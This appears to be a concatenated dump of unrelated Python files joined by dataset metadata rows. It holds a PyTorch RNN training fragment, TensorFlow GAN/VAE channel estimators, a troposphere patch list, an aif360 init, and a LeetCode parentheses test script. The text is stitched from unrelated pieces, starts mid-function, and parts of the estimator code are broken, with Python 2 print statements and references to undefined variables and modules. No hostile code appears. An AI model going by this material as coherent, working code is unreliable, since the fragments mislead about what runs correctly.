'rnn_units': self.rnn_units,
'bidi': self.bidi,
'alphabet': self.alphabet,
'dropout': self.dropout,
}, directory + '/model_weights.pt')
def load_model(self, file_name):
state = torch.load(file_name, map_location=lambda storage, loc: storage)
self.delay = state['delay']
self.model_layers = state['model_layers']
self.embedding_size = state['embedding_size']
self.bidi = state['bidi']
self.alphabet = state['alphabet']
self.mask_id = len(self.alphabet)
self.rnn_units = state['rnn_units']
self.model, loss_function, _ = self.model_setup()
self.model.load_state_dict(state['model'])
return loss_function
def save_checkpoint(self, epoch, optimizer, loss, results):
if self.checkpoint_dir is None:
return
torch.save({
'epoch': epoch,
'model_state_dict': self.model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'loss': loss,
'delay': self.delay,
'model_layers': self.model_layers,
'embedding_size': self.embedding_size,
'alphabet': self.alphabet,
'bidi': self.bidi,
'dropout': self.dropout,
'seq_length': self.seq_length,
'results': results,
'wait': self.early['wait'],
}, self.checkpoint_dir + '/checkpoint_epoch_' + str(epoch) + '.tar')
def check_early_stop(self, current_loss):
# Early stopping disabled?
if self.patience <= 0:
return False
if current_loss - self.early['best_loss'] < - self.early['min_delta']:
self.early['best_loss'] = current_loss
self.early['wait'] = 1
else:
if self.early['wait'] > self.patience:
return True
self.early['wait'] += 1
return False
def run(self):
dataset = self.preload_data("train")
dataloader = DataLoader(dataset, batch_size=self.batch_size, shuffle=True, num_workers=0)
if self.alphabet is None:
self.alphabet = dataset.get_alphabet()
self.mask_id = len(self.alphabet)
dataset_val = self.preload_data("valid")
dataloader_val = DataLoader(dataset_val, batch_size=self.batch_size, shuffle=False, num_workers=0)
model, loss_function, optimizer = self.model_setup()
self.model = model
self.total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
print('#Parameters', self.total_params)
# Add the learning rate scheduler
if self.lr_schedule:
scheduler = self.schedule = ReduceLROnPlateau(optimizer,
patience=3,
factor=self.lr_schedule,
threshold=1e-2,
threshold_mode='rel',
eps=1e-5,
verbose=True)
results = {'loss': [],
'val_loss': [],
'bpc_val': [],
'bpc_test': 1e10,
'val_time': [],
'test_time': 0.0,
}
clip = 1.0
for epoch in range(self.max_epochs):
# Training
print('Starting Epoch', epoch)
train_loss = []
for i_batch, sample_batched in enumerate(dataloader):
source_orig, targets = sample_batched['input'], sample_batched['output']
# Create mask for this batch
batch_size = source_orig.shape[0]
seq_length = source_orig.shape[1]
mask = torch.empty((batch_size, seq_length)).uniform_() <= self.p
source_orig[mask] = self.mask_id
targets[1-mask[:, :targets.shape[1]]] = self.mask_id
# NOTE: We don't need to reset the initial hidden state because the default is to use zero for c0 and h0
model.zero_grad()
# We need source_orig to be masked and the masked inputs to be used for the output (loss fun) only
output, _ = model(source_orig)
if self.delay == 0:
filtered_output = output
else:
filtered_output = output[:, self.delay:, :]
total_loss = F.nll_loss(F.log_softmax(filtered_output, dim=2).permute([0, 2, 1]), targets, ignore_index=self.mask_id)
total_loss.backward()
_ = nn.utils.clip_grad_norm_(model.parameters(), clip)
optimizer.step()
train_loss.append(total_loss.item())
print('Batch', i_batch, 'Loss:', total_loss.item(), 'mean loss', sum(train_loss) / (i_batch+1))
# Validation
model.eval()
total_bpc, total_items, total_val_loss, total_times, total_batches = self.eval_model(dataloader_val, loss_function)
results['bpc_val'].append(total_bpc / total_items)
results['val_loss'].append(total_val_loss)
results['val_time'].append(sum(total_times) / float(total_batches))
results['loss'].append(train_loss)
print('Validation BPC: ', total_bpc / total_items, 'bits/char (out of total_items:', total_items, ')')
print('Validation loss: ', total_val_loss)
mu = sum(total_times) / total_batches
print('Avg. runtime p/sequence: ', mu, ' +/- ', np.sqrt(np.sum(np.array(total_times) ** 2 - mu ** 2) / (total_batches - 1)))
print('Max. runtime: ', max(total_times))
print('Total runtime: ', sum(total_times))
model.train()
# Save a checkpoint for reference
self.save_checkpoint(epoch, optimizer, loss_function, results)
# Check LR scheduler
if self.lr_schedule:
scheduler.step(total_val_loss)
# Early stopping?
if self.check_early_stop(total_val_loss):
print('Early stopping at epoch %d...' % (epoch))
break
# check for total convergence
if total_val_loss < 1e-4:
print('Automatic stopping due to MSE error is zero')
break
# Test the trained model
model.eval()
dataset_test = self.preload_data("test")
dataloader_test = DataLoader(dataset_test, batch_size=self.batch_size, shuffle=False, num_workers=0)
total_bpc, total_items, _, total_times, total_batches = self.eval_model(dataloader_test, loss_function)
results['bpc_test'] = total_bpc / total_items
results['test_time'] = sum(total_times) / float(total_batches)
print('Test BPC: ', total_bpc / total_items, 'bits/char (out of total_items:', total_items, ')')
mu = sum(total_times) / total_batches
print('Avg. runtime p/sequence: ', mu, ' +/- ',
np.sqrt(np.sum(np.array(total_times) ** 2 - mu ** 2) / (total_batches - 1)))
print('Max. runtime: ', max(total_times))
print('Total runtime: ', sum(total_times))
return results
def run_time_measurement(self, loss_function, repetitions=5):
dataset = self.preload_data("train")
dataloader_test = DataLoader(dataset, batch_size=self.batch_size, shuffle=False, num_workers=0)
overall_times = np.zeros((repetitions,))
model_bpc = np.zeros((repetitions,))
model_loss = np.zeros((repetitions,))
all_nseq = np.zeros((repetitions,))
for j in range(repetitions+1):
# first repetition is not recorded to warm up the device (burn-in time)
out_d = self.eval_model(dataloader_test, loss_function)
if j > 0:
i = j - 1
model_bpc[i], all_nseq[i], model_loss[i], total_times, n_batches = out_d
overall_times[i] = np.mean(np.array(total_times))
if i == 0:
all_batch_times = np.zeros((repetitions, n_batches))
all_batch_times[i, ] = np.array(total_times)
print('model type:,bilstm{},y{}'.format(int(self.bidi), self.model_layers))
print('delay and units:,d{},c{}'.format(self.delay, self.rnn_units))
print('avg runtime per batch:,', np.mean(overall_times), ',', np.std(overall_times))
output = {'test_bpc': model_bpc,
'test_loss': model_loss,
'total_time': overall_times,
'batch_times': all_batch_times,
'n_sequences': all_nseq,
'delay': self.delay,
'model_layers': self.model_layers,
'embedding_size': self.embedding_size,
'bidi': self.bidi,
'n_units': self.rnn_units,}
return output
def eval_model(self, dataloader, loss_function):
total_bpc = 0.0
total_items = 0.0
total_loss = 0.0
total_batches = 0
total_times = []
with torch.no_grad():
for i_batch, sample_batched in enumerate(dataloader):
source, targets = sample_batched['input'], sample_batched['output']
batch_size = source.shape[0]
seq_length = source.shape[1]
mask = torch.empty((batch_size, seq_length)).uniform_() <= self.p
source[mask] = self.mask_id
targets[1 - mask[:, :targets.shape[1]]] = self.mask_id
# Predict for this batch
start_time = time.time()
char_scores, _ = self.model(source)
end_time = time.time() - start_time
# Compute BPC for the batch
# NOTE: Softmax missing at the output of the network
if self.delay == 0:
bpc, batch_size = self.bits_per_character(F.softmax(char_scores, 2), targets)
batch_size = float(torch.sum(mask).item())
val_loss = F.nll_loss(F.log_softmax(char_scores, dim=2).permute([0, 2, 1]), targets, ignore_index=self.mask_id)
else:
bpc, batch_size = self.bits_per_character(F.softmax(char_scores[:, self.delay:, :], 2), targets)
batch_size = float(torch.sum(mask).item())
val_loss = F.nll_loss(F.log_softmax(char_scores, dim=2).permute([0, 2, 1])[:, :, self.delay:], targets, ignore_index=self.mask_id)
total_loss += val_loss.item()
total_bpc += bpc
total_items += batch_size
total_batches += 1
total_times.append(end_time)
return total_bpc, total_items, total_loss / total_batches, total_times, total_batches
def bits_per_character(self, predictions, targets, divide_result=False):
""" Compute BPC for a tensor of softmax outputs vs expected target values"""
elements = predictions.shape[0]
eps = 1e-8
log2_scores = torch.log2(predictions + eps)
# create a mask of 1 and 0s for ground truth.
batch_size, seq_length, len_alfa = log2_scores.shape
mask_bpc = torch.zeros((batch_size, seq_length, len_alfa+1), device=log2_scores.device)
for elem_batch in range(elements):
mask_bpc[elem_batch, torch.arange(self.seq_length), targets[elem_batch, :]] = -1.0
# compute bpc for each element in the batch
bpc = torch.sum(torch.sum(torch.sum(torch.mul(log2_scores, mask_bpc[:,:,:-1]), 2), 1)).item()
if divide_result:
return bpc / elements
else:
return bpc, elements
| 45.04541 | 150 | 0.551906 | 5,093 | 45,631 | 4.711761 | 0.066366 | 0.022503 | 0.018752 | 0.011251 | 0.824061 | 0.795433 | 0.779097 | 0.758887 | 0.74276 | 0.729716 | 0 | 0.011429 | 0.348053 | 45,631 | 1,012 | 151 | 45.089921 | 0.79522 | 0.048454 | 0 | 0.746495 | 0 | 0 | 0.065353 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045561 | false | 0 | 0.008178 | 0.001168 | 0.103972 | 0.046729 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a5501872764df96d461af0d51820d36eef231f1c | 15,570 | py | Python | csgm/src/channel_estimators.py | zbaoye/progressive_growing_of_gans_tensorflow | 7eefe325e40c7af4462d53836d0cf11511c58c41 | [
"MIT"
] | null | null | null | csgm/src/channel_estimators.py | zbaoye/progressive_growing_of_gans_tensorflow | 7eefe325e40c7af4462d53836d0cf11511c58c41 | [
"MIT"
] | null | null | null | csgm/src/channel_estimators.py | zbaoye/progressive_growing_of_gans_tensorflow | 7eefe325e40c7af4462d53836d0cf11511c58c41 | [
"MIT"
] | null | null | null | """Estimators for compressed sensing"""
# pylint: disable = C0301, C0103, C0111, R0914
from sklearn.linear_model import OrthogonalMatchingPursuit
import numpy as np
import tensorflow as tf
import channel_model_def
from mnist_utils import save_image
import utils
def lasso_estimator(hparams): # pylint: disable = W0613
"""LASSO estimator"""
def estimator(A_val, y_batch_val, hparams):
x_hat_batch = []
for i in range(hparams.batch_size):
y_val = y_batch_val[i]
x_hat = utils.solve_lasso(A_val, y_val, hparams)
x_hat = np.maximum(np.minimum(x_hat, 1), 0)
x_hat_batch.append(x_hat)
x_hat_batch = np.asarray(x_hat_batch)
return x_hat_batch
return estimator
def omp_estimator(hparams):
"""OMP estimator"""
omp_est = OrthogonalMatchingPursuit(n_nonzero_coefs=hparams.omp_k)
def estimator(A_val, y_batch_val, hparams):
x_hat_batch = []
for i in range(hparams.batch_size):
y_val = y_batch_val[i]
omp_est.fit(A_val.T, y_val.reshape(hparams.num_measurements))
x_hat = omp_est.coef_
x_hat = np.reshape(x_hat, [-1])
x_hat = np.maximum(np.minimum(x_hat, 1), 0)
x_hat_batch.append(x_hat)
x_hat_batch = np.asarray(x_hat_batch)
return x_hat_batch
return estimator
def pggan_estimator(hparams):
# pylint: disable = C0326
# Get a session
sess = tf.Session()
# Set up palceholders
Tx = tf.placeholder(tf.float32, shape=hparams.modSignal_shape, name='Tx')
Rx = tf.placeholder(tf.float32, shape=hparams.modSignal_shape, name='Rx')
Pilot = tf.placeholder(tf.float32, shape=[hparams.batch_size, hparams.pilot_dim], name='Pilot')
# Create the generator
z_batch = tf.Variable(tf.random.normal([hparams.batch_size, hparams.z_dim]), name='z_batch')
H_hat, restore_dict_gen, restore_path_gen = channel_model_def.pggan_gen(z_batch, Pilot, hparams)
# measure the estimate
print('H_hat:',H_hat.shape)
print('Tx:',Tx.shape)
Rx_hat = utils.calRx(H_hat,Tx,hparams)
'''
if hparams.measurement_type == 'project':
y_hat_batch = tf.identity(x_hat_batch, name='y2_batch')
elif hparams.measurement_type == 'pilot':
Rx_hat = utils.calRx(H_hat,Tx,hparams)
# Rx_hat = utils.multiComplex(H_hat,Tx);
# Rx_hat = tf.multiply(H_hat, Tx, name='y_hat') # TODO complex mult
else:
measurement_is_sparse = (hparams.measurement_type in ['inpaint', 'superres'])
y_hat_batch = tf.matmul(x_hat_batch, A, b_is_sparse=measurement_is_sparse, name='y2_batch')
'''
# define all losses
if hparams.measurement_type == 'pilot':
# only polit Loss
m_loss1_batch = tf.abs(utils.get_tf_pilot(Rx) - utils.get_tf_pilot(Rx_hat))
m_loss2_batch = (utils.get_tf_pilot(Rx) - utils.get_tf_pilot(Rx_hat))**2
zp_loss_batch = tf.reduce_sum(z_batch**2, 1)
else:
m_loss1_batch = tf.reduce_mean(tf.abs(Rx - Rx_hat), 1)
m_loss2_batch = tf.reduce_mean((Rx - Rx_hat)**2, 1)
zp_loss_batch = tf.reduce_sum(z_batch**2, 1)
# define total loss
total_loss_batch = hparams.mloss1_weight * m_loss1_batch \
+ hparams.mloss2_weight * m_loss2_batch \
+ hparams.zprior_weight * zp_loss_batch
total_loss = tf.reduce_mean(total_loss_batch)
# Compute means for logging
m_loss1 = tf.reduce_mean(m_loss1_batch)
m_loss2 = tf.reduce_mean(m_loss2_batch)
zp_loss = tf.reduce_mean(zp_loss_batch)
# Set up gradient descent
var_list = [z_batch]
global_step = tf.Variable(0, trainable=False, name='global_step')
learning_rate = utils.get_learning_rate(global_step, hparams)
with tf.variable_scope(tf.get_variable_scope(), reuse=False):
opt = utils.get_optimizer(learning_rate, hparams)
update_op = opt.minimize(total_loss, var_list=var_list, global_step=global_step, name='update_op')
opt_reinit_op = utils.get_opt_reinit_op(opt, var_list, global_step)
# Intialize and restore model parameters
init_op = tf.global_variables_initializer()
sess.run(init_op)
restorer_gen = tf.train.Saver(var_list=restore_dict_gen)
restorer_gen.restore(sess, restore_path_gen)
def estimator(Tx_val, Rx_val, Pilot_val, hparams):
"""Function that returns the estimated image"""
best_keeper = utils.BestKeeper(hparams)
if hparams.measurement_type == 'project':
feed_dict = {y_batch: y_batch_val}
else:
feed_dict = {Tx: Tx_val, Rx: Rx_val, Pilot: Pilot_val}
for i in range(hparams.num_random_restarts):
sess.run(opt_reinit_op)
for j in range(hparams.max_update_iter):
if hparams.gif and ((j % hparams.gif_iter) == 0):
images = sess.run(x_hat_batch, feed_dict=feed_dict)
for im_num, image in enumerate(images):
save_dir = '{0}/{1}/'.format(hparams.gif_dir, im_num)
utils.set_up_dir(save_dir)
save_path = save_dir + '{0}.png'.format(j)
image = image.reshape(hparams.image_shape)
save_image(image, save_path)
_, lr_val, total_loss_val, \
m_loss1_val, \
m_loss2_val, \
zp_loss_val = sess.run([update_op, learning_rate, total_loss,
m_loss1,
m_loss2,
zp_loss], feed_dict=feed_dict)
logging_format = 'rr {} iter {} lr {} total_loss {} m_loss1 {} m_loss2 {} zp_loss {}'
print logging_format.format(i, j, lr_val, total_loss_val,
m_loss1_val,
m_loss2_val,
zp_loss_val)
H_hat_val, total_loss_val = sess.run([H_hat, total_loss], feed_dict=feed_dict)
best_keeper.report(H_hat_val, total_loss_val)
return best_keeper.get_best()
return estimator
def dcgan_estimator(hparams):
# pylint: disable = C0326
# Get a session
sess = tf.Session()
# Set up palceholders
Tx = tf.placeholder(tf.float32, shape=hparams.modSignal_shape, name='Tx')
Rx = tf.placeholder(tf.float32, shape=hparams.modSignal_shape, name='Rx')
Pilot = tf.placeholder(tf.float32, shape=[hparams.batch_size, hparams.pilot_dim], name='Pilot')
# Create the generator
z_batch = tf.Variable(tf.random.uniform([hparams.batch_size, hparams.z_dim]), name='z_batch')
H_hat, restore_dict_gen, restore_path_gen = channel_model_def.dcgan_gen(z_batch, Pilot, hparams)
# Create the discriminator
#prob, restore_dict_discrim, restore_path_discrim = channel_model_def.dcgan_discrim(H_hat, Pilot, hparams)
# measure the estimate
Rx_hat = utils.calRx(H_hat,Tx,hparams)
'''
if hparams.measurement_type == 'project':
y_hat_batch = tf.identity(x_hat_batch, name='y2_batch')
elif hparams.measurement_type == 'pilot':
Rx_hat = utils.calRx(H_hat,Tx,hparams)
# Rx_hat = utils.multiComplex(H_hat,Tx);
# Rx_hat = tf.multiply(H_hat, Tx, name='y_hat') # TODO complex mult
else:
measurement_is_sparse = (hparams.measurement_type in ['inpaint', 'superres'])
y_hat_batch = tf.matmul(x_hat_batch, A, b_is_sparse=measurement_is_sparse, name='y2_batch')
'''
# define all losses
if hparams.measurement_type == 'pilot':
# only polit Loss
m_loss1_batch = tf.abs(utils.get_tf_pilot(Rx) - utils.get_tf_pilot(Rx_hat))
m_loss2_batch = (utils.get_tf_pilot(Rx) - utils.get_tf_pilot(Rx_hat))**2
zp_loss_batch = tf.reduce_sum(z_batch**2, 1)
#d_loss1_batch = -tf.log(prob)
#d_loss2_batch = tf.log(1-prob)
else:
m_loss1_batch = tf.reduce_mean(tf.abs(Rx - Rx_hat), 1)
m_loss2_batch = tf.reduce_mean((Rx - Rx_hat)**2, 1)
zp_loss_batch = tf.reduce_sum(z_batch**2, 1)
#d_loss1_batch = -tf.log(prob)
#d_loss2_batch = tf.log(1-prob)
# define total loss
total_loss_batch = hparams.mloss1_weight * m_loss1_batch \
+ hparams.mloss2_weight * m_loss2_batch \
+ hparams.zprior_weight * zp_loss_batch
total_loss = tf.reduce_mean(total_loss_batch)
# Compute means for logging
m_loss1 = tf.reduce_mean(m_loss1_batch)
m_loss2 = tf.reduce_mean(m_loss2_batch)
zp_loss = tf.reduce_mean(zp_loss_batch)
#d_loss1 = tf.reduce_mean(d_loss1_batch)
#d_loss2 = tf.reduce_mean(d_loss2_batch)
# Set up gradient descent
var_list = [z_batch]
global_step = tf.Variable(0, trainable=False, name='global_step')
learning_rate = utils.get_learning_rate(global_step, hparams)
with tf.variable_scope(tf.get_variable_scope(), reuse=False):
opt = utils.get_optimizer(learning_rate, hparams)
update_op = opt.minimize(total_loss, var_list=var_list, global_step=global_step, name='update_op')
opt_reinit_op = utils.get_opt_reinit_op(opt, var_list, global_step)
# Intialize and restore model parameters
init_op = tf.global_variables_initializer()
sess.run(init_op)
restorer_gen = tf.train.Saver(var_list=restore_dict_gen)
#restorer_discrim = tf.train.Saver(var_list=restore_dict_discrim)
restorer_gen.restore(sess, restore_path_gen)
#restorer_discrim.restore(sess, restore_path_discrim)
def estimator(Tx_val, Rx_val, Pilot_val, hparams):
"""Function that returns the estimated image"""
best_keeper = utils.BestKeeper(hparams)
if hparams.measurement_type == 'project':
feed_dict = {y_batch: y_batch_val}
else:
feed_dict = {Tx: Tx_val, Rx: Rx_val, Pilot: Pilot_val}
for i in range(hparams.num_random_restarts):
sess.run(opt_reinit_op)
for j in range(hparams.max_update_iter):
if hparams.gif and ((j % hparams.gif_iter) == 0):
images = sess.run(x_hat_batch, feed_dict=feed_dict)
for im_num, image in enumerate(images):
save_dir = '{0}/{1}/'.format(hparams.gif_dir, im_num)
utils.set_up_dir(save_dir)
save_path = save_dir + '{0}.png'.format(j)
image = image.reshape(hparams.image_shape)
save_image(image, save_path)
_, lr_val, total_loss_val, \
m_loss1_val, \
m_loss2_val, \
zp_loss_val = sess.run([update_op, learning_rate, total_loss,
m_loss1,
m_loss2,
zp_loss], feed_dict=feed_dict)
logging_format = 'rr {} iter {} lr {} total_loss {} m_loss1 {} m_loss2 {} zp_loss {}'
print logging_format.format(i, j, lr_val, total_loss_val,
m_loss1_val,
m_loss2_val,
zp_loss_val)
H_hat_val, total_loss_val = sess.run([H_hat, total_loss], feed_dict=feed_dict)
best_keeper.report(H_hat_val, total_loss_val)
return best_keeper.get_best()
return estimator
def vae_estimator(hparams):
# Get a session
sess = tf.Session()
# Set up palceholders
Tx = tf.placeholder(tf.float32, shape=hparams.image_shape, name='Tx')
Rx = tf.placeholder(tf.float32, shape=hparams.image_shape, name='Rx')
# Create the generator
# TODO: Move z_batch definition here
z_batch, H_hat, restore_path, restore_dict = channel_model_def.vae_gen(hparams)
# measure the estimate
if hparams.measurement_type == 'project':
Rx_hat = tf.identity(x_hat_batch, name='y_hat_batch')
elif hparams.measurement_type == 'pilot':
Rx_hat = utils.multiComplex(H_hat,Tx);
# Rx_hat = tf.multiply(H_hat, Tx, name='y_hat') # TODO complex mult
else:
Rx_hat = tf.multiply(H_hat, Tx, name='y_hat')
# define all losses
m_loss1_batch = tf.reduce_mean(tf.reduce_mean(tf.abs(Rx - Rx_hat), 1),0)
m_loss2_batch = tf.reduce_mean(tf.reduce_mean((Rx - Rx_hat)**2, 1),0)
zp_loss_batch = tf.reduce_sum(z_batch**2, 1)
# define total loss
total_loss_batch = hparams.mloss1_weight * m_loss1_batch \
+ hparams.mloss2_weight * m_loss2_batch \
+ hparams.zprior_weight * zp_loss_batch
total_loss = tf.reduce_mean(total_loss_batch)
# Compute means for logging
m_loss1 = tf.reduce_mean(m_loss1_batch)
m_loss2 = tf.reduce_mean(m_loss2_batch)
zp_loss = tf.reduce_mean(zp_loss_batch)
# Set up gradient descent
var_list = [z_batch]
global_step = tf.Variable(0, trainable=False, name='global_step')
learning_rate = utils.get_learning_rate(global_step, hparams)
opt = utils.get_optimizer(learning_rate, hparams)
update_op = opt.minimize(total_loss, var_list=var_list, global_step=global_step, name='update_op')
opt_reinit_op = utils.get_opt_reinit_op(opt, var_list, global_step)
# Intialize and restore model parameters
init_op = tf.global_variables_initializer()
sess.run(init_op)
restorer = tf.train.Saver(var_list=restore_dict)
restorer.restore(sess, restore_path)
def estimator(Tx_val, Rx_val, hparams):
"""Function that returns the estimated image"""
best_keeper = utils.BestKeeper(hparams)
if hparams.measurement_type == 'project':
feed_dict = {Rx: Rx_val}
else:
feed_dict = {Tx: Tx_val, Rx: Rx_val}
for i in range(hparams.num_random_restarts):
sess.run(opt_reinit_op)
for j in range(hparams.max_update_iter):
_, lr_val, total_loss_val, \
m_loss1_val, \
m_loss2_val, \
zp_loss_val = sess.run([update_op, learning_rate, total_loss,
m_loss1,
m_loss2,
zp_loss], feed_dict=feed_dict)
logging_format = 'rr {} iter {} lr {} total_loss {} m_loss1 {} m_loss2 {} zp_loss {}'
print logging_format.format(i, j, lr_val, total_loss_val,
m_loss1_val,
m_loss2_val,
zp_loss_val)
H_hat_val, total_loss_batch_val = sess.run([H_hat, total_loss_batch], feed_dict=feed_dict)
best_keeper.report(H_hat_val, total_loss_batch_val)
return best_keeper.get_best()
return estimator
def learned_estimator(hparams):
sess = tf.Session()
y_batch, x_hat_batch, restore_dict = mnist_model_def.end_to_end(hparams)
restore_path = utils.get_A_restore_path(hparams)
# Intialize and restore model parameters
restorer = tf.train.Saver(var_list=restore_dict)
restorer.restore(sess, restore_path)
def estimator(A_val, y_batch_val, hparams): # pylint: disable = W0613
"""Function that returns the estimated image"""
x_hat_batch_val = sess.run(x_hat_batch, feed_dict={y_batch: y_batch_val})
return x_hat_batch_val
return estimator
| 42.540984 | 110 | 0.629094 | 2,146 | 15,570 | 4.217614 | 0.093663 | 0.035797 | 0.029168 | 0.016573 | 0.880124 | 0.860568 | 0.852613 | 0.829853 | 0.825323 | 0.811623 | 0 | 0.014026 | 0.271933 | 15,570 | 365 | 111 | 42.657534 | 0.784404 | 0.087283 | 0 | 0.824034 | 0 | 0 | 0.03057 | 0 | 0 | 0 | 0 | 0.008219 | 0 | 0 | null | null | 0 | 0.025751 | null | null | 0.021459 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3c6c6c62a18a70a305e80f9a1970d2b4079c209b | 286 | py | Python | scripts/patches/fis.py | CptnDuras/troposphere | 1bf912f9cf149ec111154679f53ee9ec92556555 | [
"BSD-2-Clause"
] | null | null | null | scripts/patches/fis.py | CptnDuras/troposphere | 1bf912f9cf149ec111154679f53ee9ec92556555 | [
"BSD-2-Clause"
] | null | null | null | scripts/patches/fis.py | CptnDuras/troposphere | 1bf912f9cf149ec111154679f53ee9ec92556555 | [
"BSD-2-Clause"
] | null | null | null | patches = [
{
"op": "add",
"path": "/ResourceTypes/AWS::FIS::ExperimentTemplate/Properties/Tags/PrimitiveType",
"value": "Map",
},
{
"op": "remove",
"path": "/ResourceTypes/AWS::FIS::ExperimentTemplate/Properties/Tags/Type",
},
]
| 23.833333 | 92 | 0.541958 | 23 | 286 | 6.73913 | 0.652174 | 0.219355 | 0.258065 | 0.296774 | 0.709677 | 0.709677 | 0.709677 | 0 | 0 | 0 | 0 | 0 | 0.258741 | 286 | 11 | 93 | 26 | 0.731132 | 0 | 0 | 0 | 0 | 0 | 0.58042 | 0.479021 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3c823bc2c848fefbdb1ab8c091406d8fa8f4715d | 96 | py | Python | aif360/detectors/__init__.py | IBM/AIF-360 | 9eae52000c92bbc9279f8ee4bdb7a7c5ac585359 | [
"Apache-2.0"
] | 982 | 2018-09-12T17:19:11.000Z | 2020-07-13T21:26:24.000Z | aif360/detectors/__init__.py | IBM/AIF-360 | 9eae52000c92bbc9279f8ee4bdb7a7c5ac585359 | [
"Apache-2.0"
] | 109 | 2018-09-12T20:39:43.000Z | 2020-07-09T20:12:00.000Z | aif360/detectors/__init__.py | IBM/AIF-360 | 9eae52000c92bbc9279f8ee4bdb7a7c5ac585359 | [
"Apache-2.0"
] | 335 | 2018-09-13T15:35:09.000Z | 2020-07-06T10:56:12.000Z | from aif360.detectors.mdss.MDSS import MDSS
from aif360.detectors.mdss_detector import bias_scan | 48 | 52 | 0.875 | 15 | 96 | 5.466667 | 0.533333 | 0.243902 | 0.463415 | 0.560976 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067416 | 0.072917 | 96 | 2 | 52 | 48 | 0.853933 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
b1e9ae815e493dea089d5decb6cba4744e113efb | 13,091 | py | Python | s32.py | glcrazier/LeetCodePlay | cf951a079d458e02000d170529cb1e3b049da023 | [
"MIT"
] | 1 | 2018-02-20T13:56:02.000Z | 2018-02-20T13:56:02.000Z | s32.py | glcrazier/LeetCodePlay | cf951a079d458e02000d170529cb1e3b049da023 | [
"MIT"
] | null | null | null | s32.py | glcrazier/LeetCodePlay | cf951a079d458e02000d170529cb1e3b049da023 | [
"MIT"
] | null | null | null | from solution import Solution
if __name__ == '__main__':
sol = Solution()
print sol.longestValidParentheses("(")
print sol.longestValidParentheses("(()")
print sol.longestValidParentheses("(()()")
print sol.longestValidParentheses("())())")
print sol.longestValidParentheses("(()())")
print sol.longestValidParentheses("()(())")
print sol.longestValidParentheses("()(()")
print sol.longestValidParentheses("()(()(()")
print sol.longestValidParentheses("((()))())")
print sol.longestValidParentheses(")(((((()())()()))()(()))(")
print sol.longestValidParentheses("((())))()())))(((()()(())))((()(())()((()))())())())()())))))))(((()(())(()))(()()(()()((()))()(())(()(())))))()(())(()()(((()(()()))))((()()))))))()((()())()()))((())()((((()))()()()((()())))())((())))))))(()()((((((()))(((((((()()))((())()(()())()()()(()())(()())(())))()()))))()(((())(())(()())()))()(()))(())((()))))(())))()))((()((()(())(()()()()()))(())())()))))()(()(((())))()()()(((()((()))(()((((((())((()))(()(())(()))(())())))()()))))())(()((()()())()))((((()(()))()()))(()())))((()))(()((((()(())(())()((()))(()))())))(((()(())))((())()(()(((())))())())()()()())((()()))))))(()))(())()(((()))()()((()))(()))(((()))))))))(()(())())(()((())(()()))((())))(()())((((())))(()(()))())(((()(()((()(())((())())(()))(())))()()(())((()()))((()()((()()())())()))())()))())()))())(()(()))(()))()(())))((((())()())()()())((()())(()())(()()))()(())(())))))()()()((()(())(((()(())()()))(()()((()(((()))))))))(((()((()()((()(((((())((()((()((((((((())()))())((())((()((()(()((())(((()(()))())))))))))))))()((()(())())))()(()))(((()))())()(((()))))((()(())(()())(((()(((()((((())()))))(())((()(((((()((()(()()()()((()((((((((((((())()(()))()()(()())()(()(((()((()(()()()())))((())()))())()()))())(((()(())))))()()()(((())))((()(()(((())(())(()((((()(((()(())(((((())()))())())()()(()())((((()(())))((()())))))))))()(()(())))))))()))()())))((())(()()()()()()()(())(()())))))())((()()))))()))))((())((()(((()))))(((()()))()(()((()()())()))(((()(()((())(()(()(()()))()((()(())))()((())))))(())()(())()))((())(((((()))()())(())))((((()((())())(())))(())))))((())())())((((()((())))()()((()()()))()())())(()())(((()))()()))))(()(())(()))()())(()())(()))(((((((()(()))())()())()())((()(((((()())(((())))()())))(()(()(())()((())()))(())))())()))((((()))())((()))(())))))(()))))))(()))))(())))())()()())()()(())()()(((((()))(((()()))()(()((((()(()(()(())))())))())(()()())()(()))())(()()))(()()((()()))))))(())((()()))(())))())())(())((((()))))()))()))()()()))))((((()((())(()))(()()))(())()())(()())))(()(()(())((()())()((())(()))()))()))))((())))(())(()))()()()()()))((())(((()(())))(((((((()(()))(()))())()((()))(()(())((()((()((())))()()((())))))((((())()())(()()(((()()((()))()()((())))(((()())((((()(())())))())()()()(())()))))))()()((()))())(()(((()()))((())))())())())((((()(((()(())())()())((()((()(()((())()(()))()((())))()(()))))(((()))())())(()((()))))()()(((((()))())))(()(()(())((((())())))((()()())(((((((()(()(()))(())))))()))(()(((((())()))((()()()()((()))()(()()()()))(()))))())())()))()(()()(((())((()))(()())))((()()(((())())))))))(())))((()(()(((())((((()))))(()()()))))(((((((())(()(()))(()(())((())(()(()(()(()())(())()(())(()()(()(()))())(())()()(((()())(())(()(((()()(())()((((()()))())(((()(((((()())